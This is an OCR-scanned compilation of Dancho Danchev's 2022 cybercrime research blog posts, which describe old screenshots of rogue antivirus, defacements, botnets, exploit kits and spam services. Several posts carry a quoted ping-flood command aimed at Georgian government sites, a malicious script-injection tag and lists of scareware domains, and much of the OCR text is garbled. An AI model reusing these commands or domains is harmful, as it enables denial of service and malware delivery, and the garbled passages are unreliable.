all Trojan 
° Spyware 
@ Sovware 


scoreg: [IMEEM R GRE 


Path: c:\Documents an...onlinestores.metaservices.mécrosoftf1].txt 


Infections Found: 


c:\Program Files 
Hidden Desktop 
C:\WINDOWS 
Hidden Desktop 
c:\Program Files 
C:\WINDOWS 
c:\Program Files 
autorun 

Hidden Desktop 
Hidden Desktop 
¢:\Program Files 
autorun 
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#4 Registration 


Doctor Antivirus 2008: System Scan 


This Trojan is desig... 
This Trojan is desig... 
This Trojan is desig... 
This is & Family of b... 


This Trojan program... 


This Trojan is desig... 


This Trojan provide... 
This Trojan opens a... 


This Trojan is desig... 


This Trojan uses sp... 
This Troian launche... 


This Trojan downlos... 


Stay tuned! 
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18.11.4 My Old Twitter Account - Sample Twitter Background Collages Circa 2010 - 
An Analysis (2022-11-02 04:25) 


[1] 
==. 


co ; 
— 
DDanchev 


Type te Characters you toe n Be ochre below Costs Daddy 
Money 


TRY 


Tere bate Watton 8225 


Dancho Danchev 


Dear blog readers, 


| wanted to take the time and effort and elaborate more on my old [2] Twitter account circa 2010 
in terms of what really happened and how | managed to accumulate approximately 11,000 
followers on Twitter in less than three months prior to announcing that I’m joining Twitter on 
my personal blog. 


Also for the record - users interested in obtaining access to my old Twitter account for research 
and reference purposes including to actually go through it can grab a copy of it from [3]here. 
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Sample collages which | produced back then for my Twitter background in a typical cybercrime 
research fashion which I hope that you’ll enjoy include: 
[4] 


vere 


[5] 


connertion terms 


Dally 


=~ 00M 


Oancha Banchev 
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Sseacesss 


beSSSS55 


. 
. 


sz ES COTS mE 


cod x ou 
2a |cagceanntlils 
x08 
MMA fpy2uu ping -n 5000 -| 1000 www.mfa.gov.ge -t 
MBJ py3uu ping -n 5000 -I 1000 www.police.ge -t 


21 e000 


[6] 


pn 
wo 
= 
= 
a 
a 


DDanchev 
Costs Daddy 


Dancho Danchev 


| wanted to say big thanks to everyone who used to follow me on Twitter back then including 
everyone who’s following me on [7]Twitter up to present day. 


Stay tuned! 
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1. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVVXsEhXCMYF01t1b79ZYdiwBq8EmCgecR23ViUL7vpnyyrsa2DYc 
LqYE6e447Y_V25sgqX67wrHL80g1YO2xfNooPvV-m7fx0hxq9MiKe 
. https://twitter.com/danchodanche 


2 
3. https://archive.org/download/dancho_danchev_cybercrime_research_USB_Stick_torrent/Dancho_Danchev_Twitter_Aé 


count_Archive_2021.ra 


5. 
6. 
7. hetps://ewiteer.cos/dancho,danchey 


18.11.5 Exposing a Chinese Web Site Defacement Attack Campaign Against Iran- 
based Web Sites - An Analysis (2022-11-02 04:26) 


[1] 


The great Chinese people long live 


pos***Domestic safety inspection 


bttp:bLbai@e.com'’no hack Time now-2010% 19124 13:48:2 
Copyright? 2008 All Rights Reserved 


You stayed around 79 Seconds 


| took these screenshots in 2010. 
An image is worth a thousand words. 


Sample screenshots include: 


EOASAsuAOAABMRE-DiAA AEE-OAAE piss esa sont Negadgenr rao pala Fira Ma Irarsan chicken chad, the small A coming. Iranian chicken chidd, your mother 
in Iraq for a P. go back to Iraq, your mother, he commited me, “Baids,” I fuck you mother QQ40988252: 


annanuhe, 


he A RIE AIG 


China were all guilty of the death, | 
The People's Republic of China Long live! 


[3] 


“ zheniker 


ee are ol hackers} 


[4] 
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ir 


MAIteshonker.org 
‘Sei to visit, Please Wait...... 


-) 
teoan[it.w 


I'm very sorry for this Testing! 
Because of this moraiag your Iranian Cyber Army 
Maybe you Aavea't homw this thing! 

is rorking your Iranian Cyber Aowy inteesion our baide. com 

i'm very “atortwaste for you 
Please tell your so-called Iranian Cyber Aeny 

n't intresion chinese webwite about The United States authorities to intervene the iaternal affairs of Iran's response 
This is a warning! 
2 Khack by towtian... from ..Moaker Unios For Chia 


[5] 


ANYSIZe; 


we Red hacker! 


{Let the world hear the voice of China} 


{The state 


higher than the dignity of all !} 


vies 


[6] 
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[pl Me al 


[7] 
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ogywuep .cn 
adaengu .cn 
taziqow .cn 
zerkauz .cn 


ejavone .cn - 64.213.140.69 
fastsystem-guard .com 
windowsguardsuite .com 
windowssystemsuite .com 
winsecuritysuite-pro .com 
windows-protectionsuite .net 
malwarecatcher .net 
fast-scan-protect .net 
fastscansecure .net 
goryhe .cn 

pyzuhme .cn 

zydfage .cn 

ahoize .cn 

abonyag .cn 

abenapi .cn 

otobym .cn 

abicoym .cn 

nepsoym .cn 

byzfalo .cn 

pywudar .cn 

qucgyit .cn 

dahokxu .cn 

lylbaov .cn 

cusryw .cn 


2626 


ese hackers} 


> are hawking? 


S bullyy snr! JB Tran} 
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[11] 
DIRE EE ES 4 Ra 


a 


dackerChina will strive for the network security! 


The People's Republic of China 
long live 


° 


= as s a a* 
“a je e, hs Gr | & 100% ¥ 


Stay tuned! 
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18.11.6 Exposing a Publicly Accessible CAPTCHA-Solving Service - An Analysis 
(2022-11-02 04:26) 


ES) WorkerSSI 


VWser name worker5S4 Password  eook | Connect | C] 


Not connected 


Image ‘Log : 


Hot connected 


Dear blog readers, 
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I’ve decided to share with everyone a series of photos courtesy of a publicly accessible 
CAPTCHA-solving service that also includes the breaking and direct bypassing of Google’s 
reCAPTCHA with the idea to raise awareness on the fact that in today’s modern cybercrime 
ecosystem the bad guys continue to outsource the CAPTCHA solving process to humans who 
would then systematically and semi-automatically attempt to solve as many CAPTCHAs as pos- 
sible potentially earning a decent portion of revenue in the process and most importantly em- 
powering today’s modern spam and blackhat SEO tools in terms of automated CAPTCHA solving 
and account registration services on some of today’s major Web properties. 


Sample screenshots include: 


[1] 


By assess et 
store 
Total Pisexs1 | 


Chart Comparison of checked og 


*® The good CAPTCHAs statistics are correct only if al 
have the rate CAPTCHA option enabled, otherwise it wi: 
Note: Click om an operator to see i 


Go Back 


Log Out | Change Password 


RemoteCaptcha Admin Panel 


Active operators (in the last 10 minutes): 


(Username —_—=i([Total Captchas Good Captchas * 


| |Username ——‘ [Total Captchas Good Captchas * 


[2] 
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Daily Reports for mason171 


Good Capichas 
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se 
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[3] 
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RemoteCaptcha Client 


Please wait... 


()Play sound when new CAPTCHA is available. 


Vs) 


[4] 


Crarye: Anriennit 


@®,Laptcha 
Os 8 e 


Trasnas Yacteie sonpoce: OG6parnan coaze Baw Axnxayrnt 
HosBoctu Hactpomnn CramnctHxa Bananc API Kane 
Barpymeno: t) 
O8 anp.(2009) 
Hucpopmauyta He Ya larpyMtte: ty) 
Becenume cxsuuxnt! Ipu rwet Oundéixa Gopnara sarpynoc: 0 
Be 
Crangaet cfpaSotrat: Q 
O6paSot sno HemepHo: Q 
21 mapr-(2009) 
Mbopmauna O6pasorano yoneuno: ° 
1 or _ . 
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Cramectmrs Nopxroverne Yactbie sonpoce: 


ba Wc (ST TE no (mete HE Nnoxne 0 


Morazare orver(_Heranwrat_)(_Cynmaprua_| © ter orsera 0 


> Tedaayt 0 


oe 0 
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[5] 


ES Answer Agent - v1.1 
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_— 


fast-scanandprotect .net 
fastscanonline .com 
fastsearch-secure .com 
fast-systemguard .net 
go-scanandsecure .net 
goscan-protect .com 
go-searchandscan .com 
guardmyzone .net 
mynewprotection .net 
my-newprotection .net 
my-officeguard .com 
my-officeguard .net 
myprotectedsystem .com 
myprotected-system .com 
my-protectedzone .net 
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Stay tuned! 
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_11VUTairOopkAwFCsRFtpvb0JJH10W7xhACWx6eQaCWX0u_S4u3Ge 
4. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEjhrtf 1Sx8YF72YZQcl2y60zcgveL_ABhIF30BWLYSns5rJG 
VB8RMeOcdDyP2qvV87Y0qgLPMLCMQL1_JDt-Ww2qcz3b7Hm8kydBE2 
5. https: //blogger . googleusercontent .com/img/b/R29VZ2x1/AVvXsEgoq-Ub0oK_ENR3m5vA5F4H0 jMok561Im-2tNsak_VPYHjze 
ZTrddiZaWhSP51CFa28Mz6uh3CYfLgk5QK_8zb6ZyG51c3Vbndbq9s 


18.11.7 Exposing Recently Leaked Cybercrime-Friendly Forum Community Screen- 
shots - An Analysis (2022-11-02 04:26) 


[1] 
ie Cat Vew Gochmarts Widgets Mal Tools Help 
ee ae ae 
SOO DOO EB revit 9-6 : 
Q D Fednen 9) voce CD) attrcr made - (Orem images Dee to wan @ im - 


OB: Gum - 


Dear blog readers, 


I’ve decided to share some publicly obtainable and available screenshots of what appears to be 
a compromise of what used to be a high-profile cybercrime-friendly forum community with the 
idea to raise awareness on the fact that even the bad guys can suffer security breaches that 
also includes attacks from fellow researchers Law Enforcement and vendors including fellow 
cybercriminals. 


Sample screenshots include: 
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Fle Edt View Gockmars Widgets Mal Took Help 

(D Brrcwes sincnioe- vert... X GiHmws Antero -Crpa.. X [Li Corder Suan ato Se... X| > 
O0990Q§ im on : 
Q D rednes Y) ome CD) ator mode - ome Denys Or towan @ im » 


@« 


@ vBulletin Message 


etin Message 


View Foran toaders 


Carte Anhewe Top 


Qe (bers Oe ype pene coer 
Ad bd “a harp } on roe Fe r . i. 
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@ Hesrrense crpewus L) Mocneare seroncenne 


[4] 
26244 


Q D Fednen Y) vowe (D) uttror Mode - (Orem images ee wo wan @ icom - 


fie Edt View Gockmarks Widgets Mal Tools Help 
©6009 @ F iS Http: icarder.sulthowthread chp" 2507 ®@- oo pt 


Q D Frdnen Y) vome (O) sttror Mode - (Drom images Qe to wan @ om « 


best regards, | 
by Trevelyan $) — 


OpenvVPH, pptp, DoubleVPH 
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FUCK YOU - 
Admin Cl 


best regards, 
by Trevelyan $) 
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fie Edt View Gockmarts Widgets Mal Took Help 
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FUCK YOU - 
Admin Cl 


best regards, 
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ADAMI KK OREM b::) 


ServersinGcountries = So oro (shine: 
=< SS Your VPM provicer 


Demes only 


& Veortd erie Corrs the beat 
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a SHIPPING LABELS SERVICE (NEW 
Web Services 


Stay tuned! 


1. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEgxfa6BD3egkK6Urf xZg02bgbJF6THFPs9dJbG4JkgqB_L_ghI 
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18.11.8 A Peek Inside the Mod Bot Malicious Software Botnet Release - An Analysis 
(2022-11-02 04:26) 


Dear blog readers, 


Continuing the "going through my old threat intelligence research archives" blog post series 
I’ve decided to share yet another compilation of Mod Bot which is a well known malicious 
software botnet release with some pretty interesting and sophisticated features. 


An image is worth a thousand words. 


Sample screenshots include: 


[3] 
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MOD Bor Vil 


Stay tuned! 
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18.11.9 Exposing a SQL Injection Capable IRC Malware Bot - An Analysis 
(2022-11-02 04:31) 


[1] 


<Nu11[BOT ]> 
<Nu11[BOT ]> 
<Nu11[BOT ]> 
<Nu11[BOT ]> 
<Nu11[BOT ]> 
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<Nu11[BOT ]> 
<Nu11[BOT ]> 
<Nu11[BOT ]> 
<Nu11[BOT ]> 


Dear blog readers, 


I’ve decided to share with everyone a screenshot which | took back in 2010 which basically 
demonstrates an IRC malware bot which is capable of executing SQL injection campaign using 
stolen or compromised access to malware-infected hosts where the actual C &C server activity 
takes place in IRC where the botnet master can basically send instructions to any of the botnet’s 
infected hosts for the purpose of having them execute and participate in a SQL injection attack 
that also includes scanning and reconnaissance capabilities 


Stay tuned! 


1. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEjO0DebI7aGYRwhNQyuAQj6yG4A9_Wbuz8tgoQiom9K9i4Mj 
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18.11.10 Exposing BBC’s Chimera DDoS Botnet - An Analysis (2022-11-02 04:37) 


[1] 
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Dear blog readers, 


Back in 2009 the BBC bought a [2]DDoS botnet to demonstrate how it works. 


In this post I’ve decided to offer sample screenshots of the actual botnet in question with the 
idea to raise more awareness on how the BBC actually bought a DDoS botnet to demonstrate 
how it works. 


Sample screenshots include: 


[3] 
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Loader botnet. Working: Windows XP SP 1/2/3, Windows bear Bots is testing loads 20k mixed traffic - bots connect to admin ~21k 
92%). 


DDoS + SPAM + Loader - Chimera Botnet 


2mm = . mmaee ss ar a at at 1 oar t a ' . * 


| UD status ; 
Carrying out orders. 


LU Weitomes 


welcome to a offical ste! Yee 

hope that after having visited it 

vou wl surely let us Gevelop it for 
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[5] 
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myprotectionshield .com 
myprotectionzone .com 
my-protectionzone .com 
my-protectionzone .net 
myprotection-zone .net 
my-saerchsecure .com 
my-safetyprotection .com 
my-systemprotection .net 
mysystemsafety .com 
my-systemscan .com 
my-systemscanner .com 
mysystemsecurity .com 
new-scanandprotect .com 
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2008-0D.0F 13.9014 
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™ Add Load Loads 


2000-02.0F 13.98.16 


2009.03.07 13-4217 


2008-02.07 13.9820 


™ Stats botnet 


Bots Bats 


BE tetrests «Bl Clear stats 


OnLine Stats 


Stay tuned! 


1. https: //blogger .googleusercontent . com/img/b/R29vZ2x1/AVvXsEgiQK1 0HxVKzUe9eIgv24MRNDEPIOGjWP1KKG9I j 6bH25i8S 
2. https: //www. eweek. com/security/bbc-responds-to-botnet- controversy/ 

3. https: //blogger .googleusercontent . com/img/b/R29V2Z2x1/ AVVXsEixz3P }iGI6vs81kntX9MHxq04rVJg0LsCjqe97Drrq-_Cre 
4. https: //blogger . googleusercontent . com/img/b/R29v2Z2x1/AVVXsEg_a5VSTnACPFTef -LObinBIZNPncns2BTg-ZUnJTe9oqh0Q 
5. https: //blogger . googleusercontent . com/img/b/R29v2Z2x1/ AVVXsEjPaYYREQGWy8ZWu5xt1-8- AtX_k6Ib2TYODADAGU90jkGd_ 
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18.11.11 Exposing a Malware Serving Client-Side Exploits Serving Campaign at 
CNET’s Download.com Abusing Input Validation Flaws - An Analysis 
(2022-11-02 04:58) 


ke 


[1] 


™><script src="http:/Moverzpoint.info/55 js'></script> 


Reply to this comment B a 


NOTE: 
| took these screenshots in 2008. 


Did you know that back in 2008 CNET’s Download.com used to suffer from a major input vali- 
dation flaw which the infamous back then RBN (Russian Business Network) used to exploit in 
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terms of having automatically and rogue and bogus users registering on the Web site and post- 
ing iFrame injected comments which were in fact redirecting the Web site’s users to a malware- 
serving client-side exploits serving campaigns and domains courtesy of the RBN? Check out 
the analysis. 


Sample screenshots include: 


[2] 


iicom.com  fcnwk.1d/html/rb/js/tiburo... 0 = application)... 
chkpt.zdnet.com /chkpt/924192239q10891.., 0 text/plain 
adlog.com.com jadlog/i/r=7009%s=50181.,.., 0 image/gif 
dw.com.com  fisfdw.js 0 
www.cnet.com  fi/b.jpa 304 = image/jpeg 
com.com fcnwk, 1d/Ads/common/do... 0 = image/gif 
Licom.com  fcnwk.1d/iftron/vader/ba... 0 = image/aif 
iicom.com  fcnwk.1dj/iftron/oreofsite... 0 image/png 
iicom.com  fcnwk.1d/iftron/oreo/site... 0 image/png 
com.com fcnwk, 1d/i/tron/vader/ne... 0 image/png 
dw.com.com  jrubicsimp/c.gif?ver=2éts.., 43 image/gif 
.com.com  fcnwk, 1d/i/b. gif mage/aif 
.com.com fcnwk, 1d/i/tron/vader/ne... 0 image/png 
adlog.com.com jadlog/i/r=11648&s=8096,., 0 image/saif 
com.com fcnwk,1d/Ads/common/ad... 0 = image/gif 
adlog.com.com jadlog/i/r=100048s=8261,., 0 image/saif 


loverzpoint.info 


.com.com fcnwk, 1d/i/tron/vader/ne... mage/png 
.com.com fcnwk, 1d/i/tron/vader/ne... 0 = image/aif 
d.com.com fcnwk. 1djfiftron/vader/sit... mage/png 
Licom.com  fcnwk, 1djiftronjvader/hr. gif 0  image/aif 
i.com.com  fcnwk, 1d/Ads/8520/10/72... mage/aif 
com.com  fcnwk, 1dji/tiburon{hhfdot... 0 mage; gif 
dcom.com  fcnwk.1dfistron/oreo/rbLo... 0 image/png 
mads.download.com /mac-ad?S5P=16&_RGROU... 679 text/html; c... 


pn2.adserver. yahoo.com 
pn2.adserver. yahoo.com 


ja?f=20237333158pn=cn... 
ja?f=20234245268pn=cn... 


588 = text/html; c... 
588 text/html c... 


Licom.com  fcnwk. idjfi/tron/vader/ne... 0  image/aif 
iicom.com  fcnwk. idfis/tiburon/hh/187... O image/gif 
Licom.com fcnwk.1d/iftronjficonjratin... 0 image/aif 
Licom.com  fcnwk. 1dfistiburon/hh/flex... O image/gif 
ii.com.com fcnwk.1d/iftronjficonjratin... 0  image/aif 


LLcom.com 


icnwk, idjiftronficon{post... 


[3] 


)_ image/aif 
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Stay tuned! 


1. httpa://ologger.googleusercontent.con/ing/b/R29v22:0 /AVWRSE a TeTail KTiSbdobaq7aFlop_eSi@hDaFaDiFOqaSiRad 
2. https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVVXsEinGEQ- 3MN31W2BN2fVOMf4CZT-MAVUKEh1 a5SmR4PLp1DZ9 
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3. https: //blogger. googleusercontent .com/img/b/R29VZ2x1/AVvXsEjMUHg0aspd0Ygv_MQ301HAEyCqEve-9RmeC7i4dNA7JIN£C 
QvyyRS6DNcAqO JDQKYVREVZRPjG1bC601lAqy JnYH1RDnr2rRoQbsBb 


18.11.12 Exposing Sample Screenshots Courtesy of the Yes Web Malware Exploita- 
tion Kit - An Analysis (2022-11-02 05:03) 


[1] 


Dear blog readers, 


In this post I’ve decided to share some sample screenshots courtesy of the Yes web malware 
exploitation kit with the idea to raise awareness on the ease and sophistication of today’s mod- 
ern web malware exploitation kits in terms of systematically and efficiently affecting thousands 
of users globally with malicious software through the serving of outdated and already patched 
client-side exploit vulnerabilities. 


Sample screenshots include: 


[2] 
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[4] 
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Obamas crarecteee 


Gout) 127908 


Stay tuned! 


— 


bMf _x2Z0bXHxCYdhuL4xE3gkBPK j vNSWd7w63dQd_oczcgetvihcnt 
_ https: //blogger . googleusercontent . com/img/b/R29VZ2x1/AVVXsSEh8WKX9Apk£RIf qaar jZMA- 8BP9QujOyakUu8-E3v87g6s1R 
£tQoe6TCvKkabVNy9-dyWjT30K-uLpErhB2BtqGit JxEQXqWXCFSHm 
5. https: //blogger . googleusercontent . com/img/b/R29v2Z2x1 /AVVXsEi okUomZ7RuYSmi jhOSCoP9dHq¥970CNxwadkztUOI9nhN73 
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18.11.13 Exposing a Sample Russia-Based Managed Web-Based Spam Service - An 
Analysis (2022-11-02 05:09) 


eR 


[1] 
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Account Expi WebSpam System 


No mais are started 
Paymert 


Anti-captcha balance 
Npotece te Hactporen 


set acckey 


Dear blog readers, 


I’ve decided to share some sample screenshots of a managed spam service with the idea to 
raise awareness on the ease and sophistication of these services and just how easy it is to 
launch a spam campaign by outsourcing the actual management and control process to a 
managed spam service. 


Sample screenshots include: 


i : 
Account Expiry Socks 
— 
C6, tesla/2009 - 2100 Jarpymeno 0 varwceh 
Payment 
Anti-captcha balance 
Me nonyetH << Vimennth Cmecon socks -@pench epyunyio: 
set apkey 
frame 
Socks 
WebSpam System 
Mont yoeTHe Bannnee 
Surrit 
Fetpyitm Cancon socks mponce «3 Gaerne: 
D He yaanste “heprewe™, craneTe © romeu ovepean 
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Traemae » Mon puetmere Larne 


frame Mecowrpen [TSE Payment 
Mincbopnauns 06 yueTHOn panics 
E-mail agpec: * 


——— — = | 


CYMACTH THT BADET DASENPORMOE MOwTE. BOO MOTTOOEt COOCE Ome C CHET D GRANT OTCUARTECE HM HIOT RADE AADEK DSOKTPOMMOT Mowees moe Grae’ MyGen OF ate Ce w 
CpaaT HONOMRIONAH TOTRHD NO EREM) MET EMHE! ANE FOCCTRMORNEMME NADONE HEE ANE OMY HEHE HOPOCTOR 1 FRGROMNEMHE NO INERTDOHMOR MOWTE. 


Nepone: 
ee 
Nesropure napenw: 


SSS 


MPOGes oO merery Ter yall AOPOne, ye SmeTe mOOET NaDOne © OFGmx HRneN 


Anti-captche apikey: 


TT) 


Remobwe HaCTDONEN 


Sem 
© bnenniicenth (Eevgish) 
© pyconsi 


Rawee no yucersaseme ane yeetemre Beneced ane imentpoemad Mowe 


[4] 


[neenae >» WebSpam System 


Gmailcom [EE ve 
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No mais are started, 


[5] 


> Mor Yue THNe AdHHMO 
> Beate 


Frasnaa > WebSpam System » Gmail.com 


Gmail.com me New | 
JerpyI+T> CeMCoK oKkaynToe Grail.com va dain 


Segmes poe Gekee: “legen (Ptromrms) porswors 


Derpy ire Gary pacceimex (aapecaton) «2 barna: 
Sopuat Gane 

© ematiname|._t...) 

© “name” <emaa> 

© Ceot dopnar (macxa) 

Baoan Coors Macky (npHenp: email-marne-gender-post): 


Parsarerere Napawetpoe nebo. Ounererannm mapaweTpow sommem Gute armed. «ote OFCTOns THAME. WTO FTO HmteWO eM EE OCTEtaHNe MaDRMETDE MoryT HeeTe Metoe 
Maneomne Ho Mhactemonee Grart Amtrrtem Mb Hepemanmnl < rem matesmren (merpomen (sorter), Ante Ho Heperemed ( memepom Ne Hepaany Commi meow - (0). 


Coven Tem nvcema: 
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Me camotl rewe ¢ eamaoh crocus. Nyce crpoen me ermopupyerce. Setcreyey MO Stems MEDCo ar OmEN He CrMeCHIEN 


TeKct nema: 


FORTE TOT NG EAA D NOP LEet bed Beret oF Crmeconremen 


JarpyIere PERCE NHCoMe #9 abn: 


KOnHvectoo vce, OTNDABANEMMX C OANOTO OKKOYHTA Fo CECCHIO: 
30 
er Fence eecGenp eerie Cryrrabeee, Cents Oe © CeeAmenery. 


Covcox men OTnpaenTener: 


Nepenanpaanary axoneure Mecoma Ha aApeca: 
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Nepenanpasnam oxoqauyee NecdMa Ha aapeca 


Aapeca Ana oveeta (Reply-To) 


Npncoeaematy adn 
Nprcocavnnts tatn 


Npncoeanunty hain 


Stay tuned! 
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18.11.14 [OOQOOO00COOD (2022-11-02 11:44) 
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newscan-andprotect .net 
new-systemprotection .com 
online-scanandsecure .net 
online-securescanner .net 
online-systemscan .com 
onlinesystemscan .net 
protectand-secure .com 
protectionsearch .com 
safetyshield .net 
safetysystem-guard .com 
scanonline-protect .com 
scan-system .net 
scanvirus-online .net 
searchandscan .net 
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Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 
eb Site: https://ddanchev.blogspot.com 
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O0Dancho Danchev{jDancho DanchevQQO0000 
"OOOOODAstalavista.com 2003-2006[][JAstalavista.box.sk 2020-2022[]JLovely Horse 


Participant | Slashdotted Two Times | Ex-ZDNet | Ex-Webroot | Won _§ Jessy 
HOO00SCMagazineUU|D0KoobfaceQQO0|0DGCHQQO000000/0SCMagazine2011[- 
TwitterQ0000 OIOOGCHQQOU0uU "000" |00SolarWindsQQog00000 - PaloAltoNet- 


works|QFlashpointQQ00000000|0000000KoobfaceQO00000000000000|0000S!a shdot|Q00000005. 
OOO00002 0059120000005 0 000000000 OOOUDOU0N00oKoobfacefQO00000/00000000SINTOOO|Deffrey 
CarrfTaia = GlobalQQ000000/OGCHQOO0/0000000000)OlnfoSecQoo|0CyberCamp0U|ORSA = Eu- 
rope" 
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1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEgmDNQ-F g60pARFpKIt cBUSDkJpAJk5£NOtI2SC1INYEkTky 
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18.11.15 Hvem gnsker at blive gzesteblogger pa denne blog? (2022-11-02 11:46) 


[1] 
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FROWID 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 


Keere bloglesere, 


Ved du en masse om informationssikkerhed cyberkriminalitet forskning OSINT og trussel in- 
telligens indsamling herunder cyber trussel aktgrer forskning? Er du interesseret i at blive 
gaesteblogger pa denne blog, hvor du vil kunne na ud til et af de bedste og mest forskelligart- 
ede publikum inden for sikkerhedsbranchen siden december 2005, som bestar af sikkerhed- 
seksperter, forskere, leverandgrer og organisationer, herunder cyberkriminalitetsforskere, det 
amerikanske efterretningsmilja og retshandhzevende myndigheder og organisationer? 


Hvem er Dancho Danchev, og hvad er Dancho Danchev’s Blog? 


"Independent Contractor | Astalavista.com 2003-2006 | Astalavista.box.sk 2020-2022 | Lovely 
Horse Participant | Slashdotted Two Times | Ex-ZDNet | Ex-Webroot | Won Jessy H. Neal Award 
| Won SCMagazine Award | Took Down the Koobface Botnet | Preesenteret pa GCHQ med Hon- 
eynet Project | SCMagazine Who to Follow on Twitter for 2011 | Deltaget i et tophemmeligt 
GCHQ-program kaldet "Lovely Horse" | Identificeret et stort offer for SolarWinds Attack - PaloAl- 
toNetworks | Fundet malware pa Flashpoints websted | Sporet overvaget og profileret Koobface 
Botnet og afsigret en botnetoperater | Gaet til Slashdot to gange | Min personlige blog fik 5. 
6M Page Views Since December, 2005 | Min gamle Twitter-konto fik 11.000 falgere | Jeg havde | 
gennemsnit 7.000 RSS-laesere pa min blog | Jeg har min egen vinyl "Blue Sabbath Black Cheer 
/ Griefer - We Hate You Dancho Danchev" lavet af en canadisk kunstner | Kg@rer i ajeblikket 
Astalavista.box. sk | Jeg gav et interview til DW om Koobface-botnettet | Jeg gav et interview 
til NYTimes om Koobface-botnettet | Jeg gav et interview til russisk OSINT | Opfgrt som en 
stor konkurrent af Jeffrey Carrs Taia Global | Praesenteret pa GCHQ | Praesenteret pa Interpol | 
Praesenteret pa InfoSec | Preesenteret pa CyberCamp | Praesenteret pa RSA Europe" 


BEMAERK: Dine gaesteindleegsartikler kan skrives enten pa engelsk eller pa dit modersmal. Lad 
os fa det til at ske! 


Send mig en e-mail pa engelsk pa dancho.danchev@hush.com med henblik pa at spgrge om 
denne mulighed, herunder en kort introduktion, herunder eventuelt en LinkedIn-profil eller et 
CV, og jeg vil snarest vende tilbage til dig med ideen om at hverve dig og preesentere dig som 
en officiel gaesteblogger pa min personlige blog. 
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Stay tuned! 


1. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVVXsEjVX£0SbO4CYEP6xbZzoPiXa8YZEgJgeGMTCv jnidlwkncPH 
RqYx2eNmKaRoB4c4i0wD3AF _TcWHGqAE2hFdMpoqum jgYmeDUH1Gg5 


18.11.16 Kdo se chce stat hostujicim bloggerem na tomto blogu? (2022-11-02 11:46) 


[1] 


Dancho Danchev's Vlog 
opic: "Psychedelic Reality" 
ost: Dancho Danchev 
osition: Independent Contractor 
eb Site: https://ddanchev.blogspot.com 


Vazeni ¢tenari blogu, 

Vite hodné o vyzkumu informaéni bezpeénosti kybernetické kriminality OSINT a shromazdovani 
zpravodajskych informaci o hrozbach véetné vyzkumu aktérdi kybernetickych hrozeb? Mate za- 
jem stat se Guest Bloggerem na tomto blogu, kde budete mit moZnost oslovit jedno z nejlepsich 
a nejrozmanitéjsich publik v ramci bezpecnostniho primyslu od prosince 2005, které se sklada 
z bezpecnostnich expertG vyzkumnik& prodejcé a organizaci véetné vyzkumnikti kybernetické 
kriminality zoravodajské komunity USA a organ a organizaci pro vymahani prava? 


Kdo je Dancho Danchev a co je blog Dancho Dancheva? 


"Independent Contractor" | Astalavista.com 2003-2006 | Astalavista.box.sk 2020-2022 | Lovely 
Horse Participant | Slashdotted Two Times | Ex-ZDNet | Ex-Webroot | Won Jessy H. Neal Award 
| Won SCMagazine Award | Took Down the Koobface Botnet | Presented at the GCHQ with the 
Honeynet Project | SCMagazine Who to Follow on Twitter for 2011 | Participated in a Top Se- 
cret GCHQ Program called "Lovely Horse" | Identified a major victim of the SolarWinds Attack 
- PaloAltoNetworks | Found malware on the Web Site of Flashpoint | Tracked monitored and 
profiled the Koobface Botnet and revealed one botnet operator | Made it to Slashdot two times 
| My Personal Blog got 5. 6 milionGd zobrazeni stranek od prosince 2005 | M&j stary Ucet na 
Twitteru ziskal 11 000 sledujicich | Mél jsem na svém blogu v priméru 7 000 ctenart RSS | 
Mam vlastni vinyl "Blue Sabbath Black Cheer / Griefer - We Hate You Dancho Danchev" vy- 
robeny kanadskym umélcem | V soucasné dobé provozuji Astalavista.box. sk | Poskytl jsem 
rozhovor DW o botnetu Koobface | Poskytl jsem rozhovor NYTimes o botnetu Koobface | Poskytl 
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jsem rozhovor ruskému OSINT | Uveden jako hlavni konkurent Jeffreyho Carra Taia Global | 
Prezentovan na GCHQ | Prezentovan na Interpolu | Prezentovan na InfoSec | Prezentovan na 
CyberCamp | Prezentovan na RSA Europe" 


POZNAMKA: VaSe élanky pro hosty mohou byt psany bud’ v anglictiné, nebo ve vaSem rodném 
jazyce. Pojdme to uskuteénit! 


PoSlete mi e-mail v anglictiné na adresu dancho.danchev@hush.com ve smyslu dotazu na tuto 
prilezitost vCetné kratkého predstaveni, vcetné pripadného profilu na LinkedIn nebo Zivotopisu, 
a ja se vam brzy ozvu s napadem, ze vas zaradim a predstavim jako oficialniho Guest Bloggera 
na svém osobnim blogu. 


Ztstante naladéni! 


1. https: //blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEhSVkh92BvbQh41r5CWWMiNq7FlkcnBOzCAzgkcD4d_3XGW7 
6wswjaWfgaSKBzR3nQzusf 1HK1OYO60PMvLF3Lctg9YV7xYYHK1axb 


18.11.17 Wie wil gastblogger worden op deze blog? (2022-11-02 11:47) 


[1] 


FROWID 


Dancho Danchev's Vlog 

opic: "Psychedelic Reality" 

ost: Dancho Danchev 

osition: Independent Contractor 


Beste bloglezers, 


Weet je veel over informatiebeveiliging cybercrime onderzoek OSINT en threat intelligence 
verzamelen inclusief cyber threat actors onderzoek? Bent u geinteresseerd om een gastblog- 
ger te worden op deze blog waar u in staat bent om een van de beste en meest diverse 
doelgroepen binnen de beveiligingsindustrie te bereiken sinds december 2005 die bestaat 
uit beveiligingsdeskundigen onderzoekers leveranciers en organisaties waaronder cybercrimi- 
naliteit onderzoekers de Amerikaanse Intelligence Community en wetshandhavingsinstanties 
en organisaties? 


Wie is Dancho Danchev en wat is Dancho Danchev’s Blog? 
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"Independent Contractor | Astalavista.com 2003-2006 | Astalavista.box.sk 2020-2022 | Lovely 
Horse Participant | Slashdotted Two Times | Ex-ZDNet | Ex-Webroot | Won Jessy H. Neal Award 
| Won SCMagazine Award | Took down the Koobface Botnet | Presenteerde bij de GCHQ met 
het Honeynet Project | SCMagazine Who to Follow on Twitter for 2011 | Nam deel aan een Top 
Secret GCHQ Programma genaamd "Lovely Horse" | Identificeerde een belangrijk slachtoffer 
